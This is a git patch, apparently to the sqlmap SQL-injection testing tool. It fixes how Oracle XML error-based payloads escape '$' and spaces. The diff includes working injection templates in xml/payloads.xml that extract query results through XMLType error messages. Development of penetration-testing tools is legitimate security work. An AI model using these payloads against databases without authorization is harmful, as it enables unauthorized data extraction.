From b5c9ccb75585de1e8b744ff29949bf4a24b64546 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 21 Mar 2011 13:13:12 +0000 Subject: [PATCH] Oracle XML based error payload has problems with char $ as with space --- lib/controller/checks.py | 2 +- lib/core/agent.py | 1 + lib/core/option.py | 1 + lib/techniques/error/use.py | 17 ++++++++++++++--- xml/payloads.xml | 4 ++-- 5 files changed, 19 insertions(+), 6 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 4ceb66505..f808f8e70 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -344,7 +344,7 @@ def checkSqlInjection(place, parameter, value): threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) if output: - result = output.replace(kb.misc.space, " ") == "1" + result = output == "1" if result: infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title) diff --git a/lib/core/agent.py b/lib/core/agent.py index c5352d2ac..4ad9daac1 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -216,6 +216,7 @@ class Agent: payload = payload.replace("[DELIMITER_START]", kb.misc.start) payload = payload.replace("[DELIMITER_STOP]", kb.misc.stop) payload = payload.replace("[SPACE_REPLACE]", kb.misc.space) + payload = payload.replace("[DOLLAR_REPLACE]", kb.misc.dollar) payload = payload.replace("[SLEEPTIME]", str(conf.timeSec)) if origValue is not None: diff --git a/lib/core/option.py b/lib/core/option.py index 24f949e14..d78a5a8ea 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1256,6 +1256,7 @@ def __setKnowledgeBaseAttributes(flushAll=True): kb.misc.start = ":%s:" % randomStr(length=3, lowercase=True) kb.misc.stop = ":%s:" % randomStr(length=3, lowercase=True) kb.misc.space = ":%s:" % randomStr(length=1, lowercase=True) + kb.misc.dollar = ":%s:" % randomStr(length=1, lowercase=True) kb.misc.forcedDbms = None if flushAll: diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index f5410dea2..61700edcb 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -94,6 +94,8 @@ def __oneShotErrorUse(expression, field): retVal = output break + retVal = __errorReplaceChars(retVal) + dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(retVal))) return retVal @@ -134,13 +136,22 @@ def __errorFields(expression, expressionFields, expressionFieldsList, expected=N if isinstance(num, int): expression = origExpr - if output: - output = output.replace(kb.misc.space, " ") - outputs.append(output) return outputs +def __errorReplaceChars(value): + """ + Restores safely replaced characters + """ + + retVal = value + + if value: + retVal = retVal.replace(kb.misc.space, " ").replace(kb.misc.dollar, "$") + + return retVal + def errorUse(expression, expected=None, resumeValue=True, dump=False): """ Retrieve the output of a SQL query taking advantage of the error-based diff --git a/xml/payloads.xml b/xml/payloads.xml index 6b6c34971..1ff829f4a 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -1055,9 +1055,9 @@ Formats: 0 1 1 - AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]